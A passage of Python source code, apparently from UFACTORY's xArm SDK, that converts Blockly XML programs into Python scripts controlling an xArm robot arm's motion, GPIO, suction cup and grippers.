# Author: Vinman <vinman.wen@ufactory.cc> <vinman.cub@gmail.com>
try:
import xml.etree.cElementTree as ET
except ImportError:
import xml.etree.ElementTree as ET
import re
import sys
import json
import time
import random
from .blockly_highlight_block import HIGHLIGHT_BLOCKS
class BlocklyTool(object):
def __init__(self, path):
self.tree = ET.parse(path)
self.root = self.tree.getroot()
self.namespace = self.get_namespace()
self._ops = {
'EQ': '==',
'NEQ': '!=',
'LT': '<',
'LTE': '<=',
'GT': '>',
'GTE': '>='
}
self._ops2 = {
'===': '==',
'!==': '!=',
'>=': '>=',
'>': '>',
'<=': '<=',
'<': '<',
}
self._code_list = []
self._hasEvent = False
self._events = {}
self._funcs = {}
self._func_cls_exist = False
self._func_index = 0
self._index = -1
self._first_index = 0
self._is_insert = False
self.codes = ''
self._succeed = True
self._show_comment = False
self._highlight_callback = None
@property
def index(self):
self._index += 1
return self._index
@property
def func_index(self):
self._func_index += 1
return self._func_index
@property
def first_index(self):
self._first_index += 1
self._index += 1
return self._first_index
def _append_to_file(self, data):
if not self._is_insert:
self._code_list.append(data)
else:
self._code_list.insert(self.first_index, data)
def _insert_to_file(self, i, data):
self._code_list.insert(i, data)
def get_namespace(self):
try:
r = re.compile('({.+})')
if r.search(self.root.tag) is not None:
ns = r.search(self.root.tag).group(1)
else:
ns = ''
except Exception as e:
# print(e)
ns = ''
return ns
def get_node(self, tag, root=None):
if root is None:
root = self.root
return root.find(self.namespace + tag)
def get_nodes(self, tag, root=None, descendant=False, **kwargs):
if root is None:
root = self.root
nodes = []
if descendant:
func = root.iter
else:
func = root.findall
for node in func(self.namespace + tag):
flag = True
for k, v in kwargs.items():
if node.attrib[k] != v:
flag = False
if flag:
nodes.append(node)
return nodes
def _init_py3(self, arm=None, init=True, wait_seconds=1, mode=0, state=0, error_exit=True, stop_exit=True):
self._insert_to_file(self.index, '#!/usr/bin/env python3')
self._insert_to_file(self.index, '# Software License Agreement (BSD License)\n#')
self._insert_to_file(self.index, '# Copyright (c) {}, UFACTORY, Inc.'.format(time.localtime(time.time()).tm_year))
self._insert_to_file(self.index, '# All rights reserved.\n#')
self._insert_to_file(self.index, '# Author: Vinman <vinman.wen@ufactory.cc> <vinman.cub@gmail.com>\n')
self._insert_to_file(self.index, '"""')
self._insert_to_file(self.index, '# Notice')
self._insert_to_file(self.index, '# 1. Changes to this file on Studio will not be preserved')
self._insert_to_file(self.index, '# 2. The next conversion will overwrite the file with the same name')
self._insert_to_file(self.index, '"""')
self._insert_to_file(self.index, 'import sys')
self._insert_to_file(self.index, 'import math')
self._insert_to_file(self.index, 'import time')
self._insert_to_file(self.index, 'import datetime')
self._insert_to_file(self.index, 'import random')
self._insert_to_file(self.index, 'import traceback')
self._insert_to_file(self.index, 'import threading\n')
self._insert_to_file(self.index, '"""')
self._insert_to_file(self.index, '# xArm-Python-SDK: https://github.com/xArm-Developer/xArm-Python-SDK')
self._insert_to_file(self.index, '# git clone git@github.com:xArm-Developer/xArm-Python-SDK.git')
self._insert_to_file(self.index, '# cd xArm-Python-SDK')
self._insert_to_file(self.index, '# python setup.py install')
self._insert_to_file(self.index, '"""')
self._insert_to_file(self.index, 'try:')
self._insert_to_file(self.index, ' from xarm.tools import gaussian_surface_bug')
self._insert_to_file(self.index, 'except:')
self._insert_to_file(self.index, ' pass')
self._insert_to_file(self.index, 'from xarm import version')
self._insert_to_file(self.index, 'from xarm.wrapper import XArmAPI\n')
# self._insert_to_file(self.index, 'locals_keys = list(locals().keys())\n\n')
self._insert_to_file(self.index, 'def pprint(*args, **kwargs):')
self._insert_to_file(self.index, ' try:')
self._insert_to_file(self.index, ' stack_tuple = traceback.extract_stack(limit=2)[0]')
self._insert_to_file(self.index, ' print(\'[{}][{}] {}\'.format('
'time.strftime(\'%Y-%m-%d %H:%M:%S\', time.localtime(time.time())), '
'stack_tuple[1], \' \'.join(map(str, args))))')
self._insert_to_file(self.index, ' except:')
# self._insert_to_file(self.index, ' pass')
self._insert_to_file(self.index, ' print(*args, **kwargs)\n')
self._insert_to_file(self.index, 'pprint(\'xArm-Python-SDK Version:{}\'.format(version.__version__))\n')
# if self._highlight_callback is None:
# self._insert_to_file(self.index, 'highlight_callback = lambda x:x')
if arm is None:
self._insert_to_file(self.index, 'arm = XArmAPI(sys.argv[1])')
elif isinstance(arm, str):
self._insert_to_file(self.index, 'arm = XArmAPI(\'{}\')'.format(arm))
if init:
self._insert_to_file(self.index, 'arm.clean_warn()')
self._insert_to_file(self.index, 'arm.clean_error()')
self._insert_to_file(self.index, 'arm.motion_enable(True)')
self._insert_to_file(self.index, 'arm.set_mode({})'.format(mode))
self._insert_to_file(self.index, 'arm.set_state({})'.format(state))
if wait_seconds > 0:
self._insert_to_file(self.index, 'time.sleep({})\n'.format(wait_seconds))
variables = self.parse_vars()
variables = {var: 0 for var in variables}
self._insert_to_file(self.index, 'variables = {}'.format(variables))
self._insert_to_file(self.index, 'params = {\'speed\': 100, \'acc\': 2000, '
'\'angle_speed\': 20, \'angle_acc\': 500, '
'\'events\': {}, \'variables\': variables, '
'\'callback_in_thread\': True, \'quit\': False}')
if error_exit:
self._insert_to_file(self.index, '\n\n# Register error/warn changed callback')
self._insert_to_file(self.index, 'def error_warn_change_callback(data):')
self._insert_to_file(self.index, ' if data and data[\'error_code\'] != 0:')
# self._insert_to_file(self.index, ' arm.set_state(4)')
self._insert_to_file(self.index, ' params[\'quit\'] = True')
self._insert_to_file(self.index, ' pprint(\'err={}, quit\'.format(data[\'error_code\']))')
self._insert_to_file(self.index, ' arm.release_error_warn_changed_callback(error_warn_change_callback)')
self._insert_to_file(self.index, 'arm.register_error_warn_changed_callback(error_warn_change_callback)')
if stop_exit:
self._insert_to_file(self.index, '\n\n# Register state changed callback')
self._insert_to_file(self.index, 'def state_changed_callback(data):')
self._insert_to_file(self.index, ' if data and data[\'state\'] == 4:')
self._insert_to_file(self.index, ' if arm.version_number[0] >= 1 and arm.version_number[1] >= 1 and arm.version_number[2] > 0:')
self._insert_to_file(self.index, ' params[\'quit\'] = True')
self._insert_to_file(self.index, ' pprint(\'state=4, quit\')')
self._insert_to_file(self.index, ' arm.release_state_changed_callback(state_changed_callback)')
self._insert_to_file(self.index, 'arm.register_state_changed_callback(state_changed_callback)')
self._insert_to_file(self.index, '\n\n# Register counter value changed callback')
self._insert_to_file(self.index, 'if hasattr(arm, \'register_count_changed_callback\'):')
self._insert_to_file(self.index, ' def count_changed_callback(data):')
self._insert_to_file(self.index, ' if not params[\'quit\']:')
self._insert_to_file(self.index, ' pprint(\'counter val: {}\'.format(data[\'count\']))')
self._insert_to_file(self.index, ' arm.register_count_changed_callback(count_changed_callback)')
self._insert_to_file(self.index, '\n\n# Register connect changed callback')
self._insert_to_file(self.index, 'def connect_changed_callback(data):')
self._insert_to_file(self.index, ' if data and not data[\'connected\']:')
self._insert_to_file(self.index, ' params[\'quit\'] = True')
self._insert_to_file(self.index, ' pprint(\'disconnect, connected={}, reported={}, quit\'.format(data[\'connected\'], data[\'reported\']))')
self._insert_to_file(self.index, ' arm.release_connect_changed_callback(error_warn_change_callback)')
self._insert_to_file(self.index, 'arm.register_connect_changed_callback(connect_changed_callback)\n')
self._first_index = self._index
def _finish_py3(self, error_exit=True, stop_exit=True):
if self._hasEvent:
self._append_to_file('\n# Main loop')
self._append_to_file('while arm.connected and arm.error_code == 0 and not params[\'quit\']:')
self._append_to_file(' time.sleep(0.5)')
self._append_to_file('\n# release all event')
self._append_to_file('if hasattr(arm, \'release_count_changed_callback\'):')
self._append_to_file(' arm.release_count_changed_callback(count_changed_callback)')
if error_exit:
self._append_to_file('arm.release_error_warn_changed_callback(state_changed_callback)')
if stop_exit:
self._append_to_file('arm.release_state_changed_callback(state_changed_callback)')
self._append_to_file('arm.release_connect_changed_callback(error_warn_change_callback)\n')
def to_python(self, path=None, arm=None, init=True, wait_seconds=1, mode=0, state=0,
error_exit=True, stop_exit=True, show_comment=False, **kwargs):
self._show_comment = show_comment
self._succeed = True
self._highlight_callback = kwargs.get('highlight_callback', None)
self._init_py3(arm=arm, init=init, wait_seconds=wait_seconds, mode=mode, state=state, error_exit=error_exit, stop_exit=stop_exit)
self.parse()
self._finish_py3(error_exit=error_exit, stop_exit=stop_exit)
self.codes = '\n'.join(self._code_list)
if path is not None:
with open(path, 'w', encoding='utf-8') as f:
f.write('{}\n'.format(self.codes))
return self._succeed
def parse_vars(self):
var_list = []
variables = self.get_nodes('variables')
for vars in variables:
for variable in self.get_nodes('variable', root=vars):
var_list.append(variable.text)
return var_list
def parse(self, root=None, prefix='', arg_map=None):
blocks = self.get_nodes('block', root=root)
if blocks:
for block in blocks:
is_statement = root is None
if root is not None:
if root.tag == self.namespace + 'statement':
is_statement = True
while block is not None:
if not is_statement:
block = self.get_node('next', root=block)
if not block:
break
block = self.get_node('block', root=block)
else:
is_statement = False
if block.attrib.get('disabled', False):
continue
func = getattr(self, '_handle_{}'.format(block.attrib['type']), None)
if func:
if self._highlight_callback is not None:
if block.attrib['type'] in HIGHLIGHT_BLOCKS:
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} highlight_callback(\'{}\')'.format(prefix, block.attrib['id']))
# if block.attrib['type'] not in ['procedures_defnoreturn', 'procedures_defreturn', 'controls_if']:
# self._append_to_file('{}highlight_callback(\'{}\')'.format(prefix, block.attrib['id']))
func(block, prefix, arg_map=arg_map)
else:
self._succeed = False
print('block {} can\'t convert to python code'.format(block.attrib['type']))
# block = self.get_node('block', root=root)
# while block is not None:
# if not is_statement:
# block = self.get_node('next', root=block)
# if not block:
# break
# block = self.get_node('block', root=block)
# else:
# is_statement = False
# if block.attrib.get('disabled', False):
# continue
# func = getattr(self, '_handle_{}'.format(block.attrib['type']), None)
# if func:
# func(block, prefix)
# else:
# print('block {} can\'t convert to python code'.format(block.attrib['type']))
def __check_is_quit(self, prefix):
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
return ' {}'.format(prefix)
def _handle_set_speed(self, block, prefix='', arg_map=None):
field = self.get_node('field', root=block)
if field is not None:
value = field.text
else:
value = self.get_node('value', root=block)
value = self.get_nodes('field', root=value, descendant=True)[0].text
prefix = self.__check_is_quit(prefix)
self._append_to_file('{}params[\'speed\'] = {}'.format(prefix, value))
def _handle_set_acceleration(self, block, prefix='', arg_map=None):
field = self.get_node('field', root=block)
if field is not None:
value = field.text
else:
value = self.get_node('value', root=block)
value = self.get_nodes('field', root=value, descendant=True)[0].text
prefix = self.__check_is_quit(prefix)
self._append_to_file('{}params[\'acc\'] = {}'.format(prefix, value))
def _handle_set_angle_speed(self, block, prefix='', arg_map=None):
field = self.get_node('field', root=block)
if field is not None:
value = field.text
else:
value = self.get_node('value', root=block)
value = self.get_nodes('field', root=value, descendant=True)[0].text
prefix = self.__check_is_quit(prefix)
self._append_to_file('{}params[\'angle_speed\'] = {}'.format(prefix, value))
def _handle_set_angle_acceleration(self, block, prefix='', arg_map=None):
field = self.get_node('field', root=block)
if field is not None:
value = field.text
else:
value = self.get_node('value', root=block)
value = self.get_nodes('field', root=value, descendant=True)[0].text
prefix = self.__check_is_quit(prefix)
self._append_to_file('{}params[\'angle_acc\'] = {}'.format(prefix, value))
def _handle_set_counter_increase(self, block, prefix='', arg_map=None):
# field = self.get_node('field', root=block)
# if field is not None:
# value = field.text
# else:
# value = self.get_node('value', root=block)
# value = self.get_nodes('field', root=value, descendant=True)[0].text
if self._show_comment:
self._append_to_file('{}# set counter increase'.format(prefix))
prefix = self.__check_is_quit(prefix)
self._append_to_file('{}arm.set_counter_increase()'.format(prefix))
def _handle_set_counter_reset(self, block, prefix='', arg_map=None):
if self._show_comment:
self._append_to_file('{}# set counter reset'.format(prefix))
prefix = self.__check_is_quit(prefix)
self._append_to_file('{}arm.set_counter_reset()'.format(prefix))
def _handle_reset(self, block, prefix='', arg_map=None):
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.reset()'.format(prefix))
def _handle_sleep(self, block, prefix='', arg_map=None):
value = self.get_node('value', root=block)
value = self.__get_block_val(value, arg_map=arg_map)
# value = self.get_nodes('field', root=value, descendant=True)[0].text
if self._show_comment:
self._append_to_file('{}# set pause time'.format(prefix))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.set_pause_time({})'.format(prefix, value))
def _handle_move(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
orientation = fields[0].text
wait = fields[1].text == 'TRUE'
value = fields[2].text
if orientation == 'forward':
param = 'x'
elif orientation == 'backward':
param = 'x'
value = '-{}'.format(value)
elif orientation == 'left':
param = 'y'
elif orientation == 'right':
param = 'y'
value = '-{}'.format(value)
elif orientation == 'up':
param = 'z'
elif orientation == 'down':
param = 'z'
value = '-{}'.format(value)
else:
return
if self._show_comment:
self._append_to_file('{}# relative move'.format(prefix))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_position({}={}, speed=params[\'speed\'], mvacc=params[\'acc\'], '
'relative=True, wait={})'.format(prefix, param, value, wait))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_position, code={{}}\'.format(code))'.format(prefix))
def _handle_move_arc_to(self, block, prefix='', arg_map=None):
value = self.get_node('value', root=block)
p_block = self.get_node('block', root=value)
fields = self.get_nodes('field', root=p_block)
values = []
for field in fields[:-2]:
values.append(float(field.text))
radius = float(fields[-2].text)
wait = fields[-1].text == 'TRUE'
if self._show_comment:
self._append_to_file('{}# move{}line and {}'.format(
prefix, ' arc ' if float(radius) >= 0 else ' ', 'wait' if wait else 'no wait'))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_position(*{}, speed=params[\'speed\'], mvacc=params[\'acc\'], '
'radius={}, wait={})'.format(prefix, values, radius, wait))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_position, code={{}}\'.format(code))'.format(prefix))
def _handle_move_circle(self, block, prefix='', arg_map=None):
values = self.get_nodes('value', root=block)
# percent = self.get_nodes('field', root=values[2], descendant=True)[0].text
# percent = round(float(percent) / 360 * 100, 2)
# wait = self.get_nodes('field', root=values[3], descendant=True)[0].text == 'TRUE'
percent = self.__get_block_val(values[2], arg_map=arg_map)
wait = self.__get_block_val(values[3], arg_map=arg_map)
if wait == 'TRUE' or wait == 'FALSE':
wait = wait == 'TRUE'
p1_block = self.get_node('block', root=values[0])
fields = self.get_nodes('field', root=p1_block)
pose1 = []
for field in fields:
pose1.append(float(field.text))
p2_block = self.get_node('block', root=values[1])
fields = self.get_nodes('field', root=p2_block)
pose2 = []
for field in fields:
pose2.append(float(field.text))
if self._show_comment:
self._append_to_file('{}# move circle and {}'.format(
prefix, 'wait' if wait else 'no wait'))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.move_circle({}, {}, float({}) / 360 * 100, speed=params[\'speed\'], mvacc=params[\'acc\'], '
'wait={})'.format(prefix, pose1, pose2, percent, wait))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'move_circle, code={{}}\'.format(code))'.format(prefix))
def _handle_move_7(self, block, prefix='', arg_map=None):
value = self.get_node('value', root=block)
p_block = self.get_node('block', root=value)
fields = self.get_nodes('field', root=p_block)
values = []
for field in fields[:-1]:
values.append(float(field.text))
wait = fields[-1].text == 'TRUE'
if self._show_comment:
self._append_to_file('{}# move joint and {}'.format(prefix, 'wait' if wait else 'no wait'))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_servo_angle(angle={}, speed=params[\'angle_speed\'], '
'mvacc=params[\'angle_acc\'], wait={})'.format(prefix, values, wait))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_servo_angle, code={{}}\'.format(code))'.format(prefix))
def _handle_move_joints(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
values = []
for field in fields[:-1]:
values.append(float(field.text))
radius_fields = self.get_nodes('field', root=block, name='r')
if len(radius_fields) > 0:
radius = values[-1]
values = values[:-1]
else:
radius = None
wait = fields[-1].text == 'TRUE'
if self._show_comment:
self._append_to_file('{}# move joint and {}'.format(prefix, 'wait' if wait else 'no wait'))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_servo_angle(angle={}, speed=params[\'angle_speed\'], '
'mvacc=params[\'angle_acc\'], wait={}, radius={})'.format(prefix, values, wait, radius))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_servo_angle, code={{}}\'.format(code))'.format(prefix))
def _handle_move_cartesian(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
values = []
for field in fields[:-2]:
values.append(float(field.text))
radius = float(fields[-2].text)
wait = fields[-1].text == 'TRUE'
if self._show_comment:
self._append_to_file('{}# move{}line and {}'.format(
prefix, ' arc ' if float(radius) >= 0 else ' ', 'wait' if wait else 'no wait'))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_position(*{}, speed=params[\'speed\'], mvacc=params[\'acc\'], '
'radius={}, wait={})'.format(prefix, values, radius, wait))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_position, code={{}}\'.format(code))'.format(prefix))
def _handle_move_tool_line(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
values = []
for field in fields[:-1]:
values.append(float(field.text))
wait = fields[-1].text == 'TRUE'
if self._show_comment:
self._append_to_file('{}# move tool line and {}'.format(prefix, 'wait' if wait else 'no wait'))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_tool_position(*{}, speed=params[\'speed\'], mvacc=params[\'acc\'], '
'wait={})'.format(prefix, values, wait))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_tool_position, code={{}}\'.format(code))'.format(prefix))
def _handle_move_joints_var(self, block, prefix='', arg_map=None):
field = self.get_node('field', root=block)
wait = field.text == 'TRUE'
value_nodes = self.get_nodes('value', root=block)
values = []
for val_node in value_nodes:
val = self.__get_condition_expression(val_node, arg_map=arg_map)
values.append(val)
radius_fields = self.get_nodes('value', root=block, name='r')
if len(radius_fields) > 0:
radius = values[-1]
values = values[:-1]
else:
radius = None
values = '[{}]'.format(','.join(values))
if self._show_comment:
self._append_to_file('{}# move joint and {}'.format(prefix, 'wait' if wait else 'no wait'))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_servo_angle(angle={}, speed=params[\'angle_speed\'], '
'mvacc=params[\'angle_acc\'], wait={}, radius={})'.format(prefix, values, wait, radius))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_servo_angle, code={{}}\'.format(code))'.format(prefix))
def _handle_move_cartesian_var(self, block, prefix='', arg_map=None):
field = self.get_node('field', root=block)
wait = field.text == 'TRUE'
value_nodes = self.get_nodes('value', root=block)
values = []
for val_node in value_nodes:
val = self.__get_condition_expression(val_node, arg_map=arg_map)
values.append(val)
radius = values.pop()
values = '[{}]'.format(','.join(values))
if self._show_comment:
try:
self._append_to_file('{}# move{}line and {}'.format(
prefix, ' arc ' if float(radius) >= 0 else ' ', 'wait' if wait else 'no wait'))
except:
pass
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_position(*{}, speed=params[\'speed\'], mvacc=params[\'acc\'], '
'radius={}, wait={})'.format(prefix, values, radius, wait))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_position, code={{}}\'.format(code))'.format(prefix))
def _handle_motion_set_state(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
state = fields[0].text
if self._show_comment:
self._append_to_file('{}# set state'.format(prefix))
prefix = self.__check_is_quit(prefix)
self._append_to_file('{}arm.set_state({})'.format(prefix, state))
def _handle_motion_stop(self, block, prefix='', arg_map=None):
if self._show_comment:
self._append_to_file('{}# emergency stop'.format(prefix))
prefix = self.__check_is_quit(prefix)
self._append_to_file('{}arm.emergency_stop()'.format(prefix))
def _handle_studio_run_traj(self, block, prefix='', arg_map=None):
filename = self.get_node('field', root=block).text
value = self.get_node('value', root=block)
times = self.get_nodes('field', root=value, descendant=True)[0].text
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.playback_trajectory(times={}, filename=\'{}\', wait=True)'.format(prefix, times, filename))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'playback_trajectory, code={{}}\'.format(code))'.format(prefix))
def _handle_app_studio_traj(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
filename = fields[0].text
speed = fields[1].text
value = self.get_node('value', root=block)
times = self.get_nodes('field', root=value, descendant=True)[0].text
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.playback_trajectory(times={}, filename=\'{}\', wait=True, double_speed={})'.format(prefix, times, filename, speed))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'playback_trajectory, code={{}}\'.format(code))'.format(prefix))
def _handle_tool_message(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', block)
msg = json.dumps(fields[-1].text, ensure_ascii=False)
prefix = self.__check_is_quit(prefix)
self._append_to_file('{}print({})'.format(prefix, msg))
# msg = fields[-1].text
# self._append_to_file('{}print(\'{}\')'.format(prefix, message))
# self._append_to_file('{}print(\'{{}}\'.format(\'{}\'))'.format(prefix, message))
def _handle_tool_console(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', block)
msg = json.dumps(fields[1].text, ensure_ascii=False)
prefix = self.__check_is_quit(prefix)
self._append_to_file('{}print({})'.format(prefix, msg))
# msg = fields[1].text
# self._append_to_file('{}print(\'{}\')'.format(prefix, msg))
def _handle_tool_console_with_variable(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', block)
msg = fields[1].text
# msg = json.dumps(fields[1].text, ensure_ascii=False)
value = self.get_node('value', block)
expression = self.__get_condition_expression(value, arg_map=arg_map)
# self._append_to_file('{}value = {}'.format(prefix, expression))
prefix = self.__check_is_quit(prefix)
if msg:
self._append_to_file('{}print({}.format({}))'.format(prefix, json.dumps(msg+'{}', ensure_ascii=False), expression))
# self._append_to_file('{}pprint(\'{}{{}}\'.format({}))'.format(prefix, msg, expression))
else:
self._append_to_file('{}print(\'{{}}\'.format({}))'.format(prefix, expression))
def _handle_wait(self, block, prefix='', arg_map=None):
value = self.get_node('value', root=block)
value = self.get_nodes('field', root=value, descendant=True)[0].text
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} time.sleep({})'.format(prefix, value))
def _handle_gpio_get_digital(self, block, prefix='', arg_map=None):
io = self.get_node('field', block).text
if self._show_comment:
self._append_to_file('{}# get tgpio-{} digital'.format(prefix, io))
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.get_tgpio_digital({})'.format(prefix, io))
def _handle_gpio_get_analog(self, block, prefix='', arg_map=None):
io = self.get_node('field', block).text
if self._show_comment:
self._append_to_file('{}# get tgpio-{} analog'.format(prefix, io))
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.get_tgpio_analog({})'.format(prefix, io))
def _handle_gpio_set_digital(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
io = fields[0].text
value = 0 if fields[1].text == 'LOW' else 1
delay_sec = fields[2].text if len(fields) > 2 else 0
# io = self.get_node('field', block).text
# value = self.get_node('value', root=block)
# value = self.get_nodes('field', root=value, descendant=True)[0].text
if self._show_comment:
self._append_to_file('{}# set tgpio-{} digital'.format(prefix, io))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_tgpio_digital({}, {}, delay_sec={})'.format(prefix, io, value, delay_sec))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_tgpio_digital, code={{}}\'.format(code))'.format(prefix))
def _handle_gpio_set_digital_with_xyz(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
x = fields[0].text
y = fields[1].text
z = fields[2].text
xyz = list(map(float, [x, y, z]))
tol_r = fields[3].text
io = fields[4].text
value = 0 if fields[5].text == 'LOW' else 1
# io = self.get_node('field', block).text
# value = self.get_node('value', root=block)
# value = self.get_nodes('field', root=value, descendant=True)[0].text
if self._show_comment:
self._append_to_file('{}# set tgpio-{} digital with pos {}'.format(prefix, io, xyz))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_tgpio_digital_with_xyz({}, {}, {}, {})'.format(prefix, io, value, xyz, tol_r))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_tgpio_digital_with_xyz, code={{}}\'.format(code))'.format(prefix))
def _handle_get_suction_cup(self, block, prefix='', arg_map=None):
if self._show_comment:
self._append_to_file('{}# get suction cup status'.format(prefix))
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.get_suction_cup()'.format(prefix))
def _handle_check_air_pump_state(self, block, prefix='', arg_map=None):
if self._show_comment:
self._append_to_file('{}# check air pump state'.format(prefix))
fields = self.get_nodes('field', root=block)
state = 1 if fields[0].text == 'ON' else 0
timeout = float(fields[1].text)
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.arm.check_air_pump_state({}, timeout={})'.format(prefix, state, timeout))
def _handle_check_bio_gripper_is_catch(self, block, prefix='', arg_map=None):
if self._show_comment:
self._append_to_file('{}# check bio gripper is catch'.format(prefix))
fields = self.get_nodes('field', root=block)
timeout = float(fields[0].text)
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.arm.check_bio_gripper_is_catch(timeout={})'.format(prefix, timeout))
def _handle_check_robotiq_is_catch(self, block, prefix='', arg_map=None):
if self._show_comment:
self._append_to_file('{}# check robotiq is catch'.format(prefix))
fields = self.get_nodes('field', root=block)
timeout = float(fields[0].text)
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.arm.check_robotiq_is_catch(timeout={})'.format(prefix, timeout))
def _handle_set_suction_cup(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block, name='trigger')
on = True if fields[0].text == 'ON' else False
fields = self.get_nodes('field', root=block, name='wait')
if fields and len(fields) > 0:
wait = fields[0].text == 'TRUE'
else:
wait = False
fields = self.get_nodes('field', root=block, name='delay')
delay_sec = fields[0].text if len(fields) > 0 else 0
# io = self.get_node('field', block).text
# value = self.get_node('value', root=block)
# value = self.get_nodes('field', root=value, descendant=True)[0].text
if self._show_comment:
self._append_to_file('{}# set_suction_cup({}, wait={}, delay_sec={})'.format(prefix, on, wait, delay_sec))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_suction_cup({}, wait={}, delay_sec={})'.format(prefix, on, wait, delay_sec))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_suction_cup, code={{}}\'.format(code))'.format(prefix))
def _handle_gpio_get_controller_digital(self, block, prefix='', arg_map=None):
io = self.get_node('field', block).text
if self._show_comment:
self._append_to_file('{}# get cgpio-{} digital'.format(prefix, io))
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.get_cgpio_digital({})'.format(prefix, io))
def _handle_gpio_get_controller_digital_di(self, block, prefix='', arg_map=None):
io = self.get_node('field', block).text
if self._show_comment:
self._append_to_file('{}# get cgpio-{} digital'.format(prefix, io))
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.get_cgpio_digital({})'.format(prefix, io))
def _handle_gpio_get_controller_analog(self, block, prefix='', arg_map=None):
io = self.get_node('field', block).text
if self._show_comment:
self._append_to_file('{}# get cgpio-{} analog'.format(prefix, io))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.get_cgpio_analog({})'.format(prefix, io))
def _handle_gpio_set_controller_digital(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
io = fields[0].text
value = 0 if fields[1].text == 'LOW' else 1
delay_sec = fields[2].text if len(fields) > 2 else 0
# io = self.get_node('field', block).text
# value = self.get_node('value', root=block)
# value = self.get_nodes('field', root=value, descendant=True)[0].text
